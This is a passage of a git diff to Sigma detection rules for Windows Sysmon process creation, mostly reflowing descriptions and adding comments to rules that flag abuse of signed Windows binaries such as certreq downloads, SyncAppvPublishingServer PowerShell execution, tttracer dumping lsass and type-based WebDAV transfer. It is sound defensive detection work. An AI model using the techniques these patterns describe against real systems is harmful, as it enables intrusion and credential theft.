Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \PrintBrm.exe - CommandLine|contains|all: + CommandLine|contains|all: - ' -f' - .zip condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pubprn.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pubprn.yml index c82dbde97..380a4099c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pubprn.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pubprn.yml @@ -1,8 +1,7 @@ title: Pubprn.vbs Proxy Execution id: 1fb76ab8-fa60-4b01-bddd-71e89bf555da status: test -description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute - commands. +description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands. references: - https://lolbas-project.github.io/lolbas/Scripts/Pubprn/ author: frack113 @@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \pubprn.vbs - 'script:' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml index 96afc367f..5d3a4e5bc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml @@ -1,8 +1,7 @@ title: DLL Execution via Rasautou.exe id: cd3d1298-eb3b-476c-ac67-12847de55813 status: test -description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d - option and executes the export specified in -p. +description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p. references: - https://lolbas-project.github.io/lolbas/Binaries/Rasautou/ - https://github.com/fireeye/DueDLLigence @@ -16,19 +15,16 @@ tags: logsource: product: windows category: process_creation - definition: Since options '-d' and '-p' were removed in Windows 10 this rule is - relevant only for Windows before 10. And as Windows 7 doesn't log command - line in 4688 by default, to detect this attack you need Sysmon 1 configured - or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud) + definition: Since options '-d' and '-p' were removed in Windows 10 this rule is relevant only for Windows before 10. And as Windows 7 doesn't log command line in 4688 by default, to detect this attack you need Sysmon 1 configured or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud) detection: process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rasautou.exe - - OriginalFileName: rasdlui.exe + - Image|endswith: \rasautou.exe + - OriginalFileName: rasdlui.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -d ' - ' -p ' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_register_app.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_register_app.yml index 37ee9fa78..6a7140a18 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_register_app.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_register_app.yml @@ -1,8 +1,7 @@ title: REGISTER_APP.VBS Proxy Execution id: 1c8774a0-44d4-4db0-91f8-e792359c70bd status: test -description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register - a VSS/VDS Provider as a COM+ application. +description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application. references: - https://twitter.com/sblmsrsn/status/1456613494783160325?s=20 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,12 +18,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \register_app.vbs - -register condition: process_creation and selection falsepositives: - - Legitimate usage of the script. Always investigate what's being registered to - confirm if it's benign + - Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_remote.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_remote.yml index f3a1a9c24..3d8e02f77 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_remote.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_remote.yml @@ -1,8 +1,7 @@ title: Use of Remote.exe id: 4eddc365-79b4-43ff-a9d7-99422dc34b93 status: test -description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL - bypass and running remote files. +description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files. references: - https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/ @@ -20,8 +19,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \remote.exe - - OriginalFileName: remote.exe + - Image|endswith: \remote.exe + - OriginalFileName: remote.exe condition: process_creation and selection falsepositives: - Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg). diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_replace.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_replace.yml index b9d7bc374..2f43cc6ae 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_replace.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_replace.yml @@ -1,8 +1,7 @@ title: Replace.exe Usage id: 9292293b-8496-4715-9db6-37028dcda4b3 status: test -description: Detects the use of Replace.exe which can be used to replace file with - another file +description: Detects the use of Replace.exe which can be used to replace file with another file references: - https://lolbas-project.github.io/lolbas/Binaries/Replace/ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace @@ -23,7 +22,7 @@ detection: selection: Image|endswith: \replace.exe argument: - CommandLine|contains: + CommandLine|contains: - /a - -a condition: process_creation and (selection and argument) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_runexehelper.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_runexehelper.yml index 91374161f..20c336aac 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_runexehelper.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_runexehelper.yml @@ -1,8 +1,7 @@ title: Lolbin Runexehelper Use As Proxy id: cd71385d-fd9b-4691-9b98-2b1f7e508714 status: test -description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other - programs +description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs references: - https://twitter.com/0gtweet/status/1206692239839289344 - https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_runscripthelper.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_runscripthelper.yml index d8cd105b5..62dfe21f2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_runscripthelper.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_runscripthelper.yml @@ -22,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \Runscripthelper.exe - CommandLine|contains: surfacecheck + CommandLine|contains: surfacecheck condition: process_creation and selection fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_scriptrunner.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_scriptrunner.yml index 0ba83459a..23f39bb42 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_scriptrunner.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_scriptrunner.yml @@ -1,8 +1,7 @@ title: Use of Scriptrunner.exe id: 64760eef-87f7-4ed3-93fd-655668ea9420 status: test -description: The "ScriptRunner.exe" binary can be abused to proxy execution through - it and bypass possible whitelisting +description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting references: - https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ScriptRunner.exe - - OriginalFileName: ScriptRunner.exe + - Image|endswith: \ScriptRunner.exe + - OriginalFileName: ScriptRunner.exe selection_cli: - CommandLine|contains: ' -appvscript ' + CommandLine|contains: ' -appvscript ' condition: process_creation and (all of selection*) falsepositives: - Legitimate use when App-v is deployed diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_setres.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_setres.yml index ad97d0b73..9888a58c8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_setres.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_setres.yml @@ -1,9 +1,7 @@ title: Use of Setres.exe id: 835e75bf-4bfd-47a4-b8a6-b766cac8bcb7 status: test -description: Detects the use of Setres.exe to set the screen resolution and then potentially - launch a file named "choice" (with any executable extension such as ".cmd" or - ".exe") from the current execution path +description: Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named "choice" (with any executable extension such as ".cmd" or ".exe") from the current execution path references: - https://lolbas-project.github.io/lolbas/Binaries/Setres/ - https://twitter.com/0gtweet/status/1583356502340870144 diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_sftp.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_sftp.yml index 09e66d572..4ea77a5cc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_sftp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_sftp.yml @@ -1,8 +1,7 @@ title: Use Of The SFTP.EXE Binary As A LOLBIN id: a85ffc3a-e8fd-4040-93bf-78aff284d801 status: test -description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the - "-D" flag +description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag references: - https://github.com/LOLBAS-Project/LOLBAS/pull/264 author: Nasreddine Bencherchali (Nextron Systems) @@ -20,8 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - Image|endswith: \sftp.exe - CommandLine|contains: + Image|endswith: \sftp.exe # The "sftp.exe" located in the OpenSSH directory has no OriginalFileName :( + CommandLine|contains: + # Since "-D" is a valid flag for other usage we assume the user is going to enter a path + # Either a full one like "C:\Windows\System32\calc.exe" or a relative one "..\..\..\Windows\System32\calc.exe" + # In my testing you can't execute direct binaries by their name via this method (if you found a way please update the rule) - ' -D ..' - ' -D C:\' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml index 730947709..606b5486e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml @@ -1,9 +1,7 @@ title: Sideloading Link.EXE id: 6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6 status: test -description: Detects the execution utitilies often found in Visual Studio tools that - hardcode the call to the binary "link.exe". They can be abused to sideload any - binary with the same name +description: Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary "link.exe". They can be abused to sideload any binary with the same name references: - https://twitter.com/0gtweet/status/1560732860935729152 author: Nasreddine Bencherchali (Nextron Systems) @@ -21,7 +19,8 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \link.exe - CommandLine|contains: LINK / + CommandLine|contains: LINK / # Hardcoded command line when we call tools like dumpbin.exe, editbin.exe, lib.exe...etc + # Add other filters for other legitimate locations filter_visual_studio: ParentImage|startswith: - C:\Program Files\Microsoft Visual Studio\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_sigverif.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_sigverif.yml index 274045fa5..b4e9a9452 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_sigverif.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_sigverif.yml @@ -1,8 +1,7 @@ title: Suspicious Sigverif Execution id: 7d4aaec2-08ed-4430-8b96-28420e030e04 status: test -description: Detects the execution of sigverif binary as a parent process which could - indicate it being used as a LOLBIN to proxy execution +description: Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution references: - https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/ - https://twitter.com/0gtweet/status/1457676633809330184 diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ssh.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ssh.yml index e7d4534ec..f32dfa7ff 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ssh.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ssh.yml @@ -23,14 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_parent: + # ParentCommandLine: '"C:\Windows\System32\OpenSSH\sshd.exe" -R' ParentImage: C:\Windows\System32\OpenSSH\sshd.exe selection_cli_img: Image|endswith: \ssh.exe selection_cli_flags: - - CommandLine|contains: ProxyCommand= - - CommandLine|contains|all: - - PermitLocalCommand - - LocalCommand + - CommandLine|contains: ProxyCommand= + - CommandLine|contains|all: + - PermitLocalCommand + - LocalCommand condition: process_creation and (selection_parent or all of selection_cli_*) falsepositives: - Legitimate usage for administration purposes diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml index 0111e6f6d..22cc5fb38 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml @@ -1,8 +1,7 @@ title: Suspicious LOLBIN AccCheckConsole id: 0f6da907-5854-4be6-859a-e9958747b0aa status: test -description: Detects suspicious LOLBIN AccCheckConsole execution with parameters as - used to load an arbitrary DLL +description: Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL references: - https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340 - https://twitter.com/bohops/status/1477717351017680899?s=12 @@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \AccCheckConsole.exe - - OriginalFileName: AccCheckConsole.exe + - Image|endswith: \AccCheckConsole.exe + - OriginalFileName: AccCheckConsole.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -window ' - .dll condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_atbroker.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_atbroker.yml index fc18a7264..bb9df86f3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_atbroker.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_atbroker.yml @@ -21,9 +21,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: AtBroker.exe - CommandLine|contains: start + CommandLine|contains: start filter: - CommandLine|contains: + CommandLine|contains: - animations - audiodescription - caretbrowsing diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml index 5cf4d48d0..b837f57ef 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml @@ -1,8 +1,7 @@ title: Suspicious Certreq Command to Download id: 4480827a-9799-4232-b2c4-ccc6c4e9e12b status: test -description: Detects a suspicious certreq execution taken from the LOLBAS examples, - which can be abused to download (small) files +description: Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files references: - https://lolbas-project.github.io/lolbas/Binaries/Certreq/ author: Christian Burkard (Nextron Systems) @@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certreq.exe - - OriginalFileName: CertReq.exe + - Image|endswith: \certreq.exe + - OriginalFileName: CertReq.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -Post ' - ' -config ' - ' http' diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml index 47bcdd525..92de2c4c4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml @@ -1,8 +1,7 @@ title: Suspicious Driver Install by pnputil.exe id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 status: test -description: Detects when a possible suspicious driver is being installed via pnputil.exe - lolbin +description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin references: - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - -i - /install - -a @@ -36,9 +35,7 @@ fields: - ParentCommandLine falsepositives: - Pnputil.exe being used may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making - changes in your environment. - - Pnputil.exe being executed from unfamiliar users should be investigated. If - known behavior is causing false positives, it can be exempted from the rule. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_dxcap.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_dxcap.yml index 21d3cee2c..43bb66a32 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_dxcap.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_dxcap.yml @@ -20,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \DXCap.exe - - OriginalFileName: DXCap.exe + - Image|endswith: \DXCap.exe + - OriginalFileName: DXCap.exe selection_cli: - CommandLine|contains: ' -c ' + CommandLine|contains: ' -c ' # The ".exe" is not required to run the binary condition: process_creation and (all of selection*) falsepositives: - Legitimate execution of dxcap.exe by legitimate user diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_grpconv.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_grpconv.yml index 794fb521b..7e96ef2c2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_grpconv.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_grpconv.yml @@ -1,8 +1,7 @@ title: Suspicious GrpConv Execution id: f14e169e-9978-4c69-acb3-1cff8200bc36 status: test -description: Detects the suspicious execution of a utility to convert Windows 3.x - .grp files or for persistence purposes by malicious software or actors +description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors references: - https://twitter.com/0gtweet/status/1526833181831200770 author: Florian Roth (Nextron Systems) @@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - grpconv.exe -o - grpconv -o condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml index 999353fb8..85f1b3e97 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml @@ -22,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \sqldumper.exe - CommandLine|contains: + CommandLine|contains: - '0x0110' - 0x01100:40 condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml index 311e688e4..b23f51d3d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml @@ -1,8 +1,8 @@ title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code id: fbd7c32d-db2a-4418-b92c-566eb8911133 related: - - id: fde7929d-8beb-4a4c-b922-be9974671667 - type: obsoletes + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: obsoletes status: test description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. references: @@ -23,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \SyncAppvPublishingServer.exe - - OriginalFileName: syncappvpublishingserver.exe + - Image|endswith: \SyncAppvPublishingServer.exe + - OriginalFileName: syncappvpublishingserver.exe selection_cli: - CommandLine|contains: '"n; ' + CommandLine|contains: '"n; ' condition: process_creation and (all of selection_*) fields: - ComputerName diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml index 61485355f..2308f3d73 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml @@ -21,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \SyncAppvPublishingServer.vbs - - ; + - ; # at a minimum, a semi-colon is required condition: process_creation and selection fields: - ComputerName diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_tracker.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_tracker.yml index fa774f427..1ac519c7e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_tracker.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_tracker.yml @@ -19,15 +19,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \tracker.exe - - Description: Tracker + - Image|endswith: \tracker.exe + - Description: Tracker selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /d ' - ' /c ' filter_msbuild1: - CommandLine|contains: ' /ERRORREPORT:PROMPT ' + CommandLine|contains: ' /ERRORREPORT:PROMPT ' filter_msbuild2: + # Example: + # GrandparentImage: C:\Program Files\Microsoft Visual Studio\2022\Community\Msbuild\Current\Bin\MSBuild.exe + # ParentCommandLine: "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" /nologo /nodemode:1 /nodeReuse:true /low:false + # CommandLine: "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\Tracker.exe" @"C:\Users\user\AppData\Local\Temp\tmp05c7789bc5534838bf96d7a0fed1ffff.tmp" /c "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.29.30133\bin\HostX86\x64\Lib.exe" ParentImage|endswith: - \Msbuild\Current\Bin\MSBuild.exe - \Msbuild\Current\Bin\amd64\MSBuild.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ttdinject.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ttdinject.yml index 8bb4464ac..3c6f59fd1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ttdinject.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ttdinject.yml @@ -1,8 +1,7 @@ title: Use of TTDInject.exe id: b27077d6-23e6-45d2-81a0-e2b356eea5fd status: test -description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 - and newer to debug time travel (underlying call of tttracer.exe) +description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe) references: - https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/ author: frack113 @@ -19,8 +18,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: ttdinject.exe - - OriginalFileName: TTDInject.EXE + - Image|endswith: ttdinject.exe + - OriginalFileName: TTDInject.EXE condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml index a5e7454c2..0de61c3b6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml @@ -1,16 +1,15 @@ title: Time Travel Debugging Utility Usage id: 0b4ae027-2a2d-4b93-8c7e-962caaba5b2a related: - - id: e76c8240-d68f-4773-8880-5c6f63595aaf - type: derived + - id: e76c8240-d68f-4773-8880-5c6f63595aaf + type: derived status: test -description: Detects usage of Time Travel Debugging Utility. Adversaries can execute - malicious processes and dump processes, such as lsass.exe, via tttracer.exe. +description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. references: - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/ - https://twitter.com/mattifestation/status/1196390321783025666 - https://twitter.com/oulusoyum/status/1191329746069655553 -author: "Ensar \u015Eamil, @sblmsrsn, @oscd_initiative" +author: Ensar Şamil, @sblmsrsn, @oscd_initiative date: 2020/10/06 modified: 2022/10/09 tags: diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_type.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_type.yml index 40e0930e5..74bc19555 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_type.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_type.yml @@ -1,8 +1,7 @@ title: Potential Download/Upload Activity Using Type Command id: aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f status: test -description: Detects usage of the "type" command to download/upload data from WebDAV - server +description: Detects usage of the "type" command to download/upload data from WebDAV server references: - https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22 author: Nasreddine Bencherchali (Nextron Systems) @@ -15,17 +14,18 @@ logsource: product: windows category: process_creation detection: + # Note that since built in CMD commands do not trigger a process creation. This would be detected only if used in a "/c" command process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_upload: - CommandLine|contains|all: + CommandLine|contains|all: - 'type ' - ' > \\\\' selection_download: - CommandLine|contains|all: + CommandLine|contains|all: - type \\\\ - - ' > ' + - ' > ' # Space are added to increase atom length and speed up matching. If your backend can handle this remove the space condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_unregmp2.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_unregmp2.yml index eef4d9d7f..523bf8404 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_unregmp2.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_unregmp2.yml @@ -1,8 +1,7 @@ title: Lolbin Unregmp2.exe Use As Proxy id: 727454c0-d851-48b0-8b89-385611ab0704 status: test -description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom - version of "wmpnscfg.exe" +description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe" references: - https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/ author: frack113 @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \unregmp2.exe - - OriginalFileName: unregmp2.exe + - Image|endswith: \unregmp2.exe + - OriginalFileName: unregmp2.exe selection_cmd: - CommandLine|contains: ' /HideWMP' + CommandLine|contains: ' /HideWMP' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_utilityfunctions.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_utilityfunctions.yml index 053e30938..845a4c299 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_utilityfunctions.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_utilityfunctions.yml @@ -1,8 +1,7 @@ title: UtilityFunctions.ps1 Proxy Dll id: 0403d67d-6227-4ea8-8145-4e72db7da120 status: test -description: Detects the use of a Microsoft signed script executing a managed DLL - with PowerShell. +description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell. references: - https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/ author: frack113 @@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - UtilityFunctions.ps1 - 'RegSnapin ' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml index 2ad676e6b..85c55bc90 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml +++ 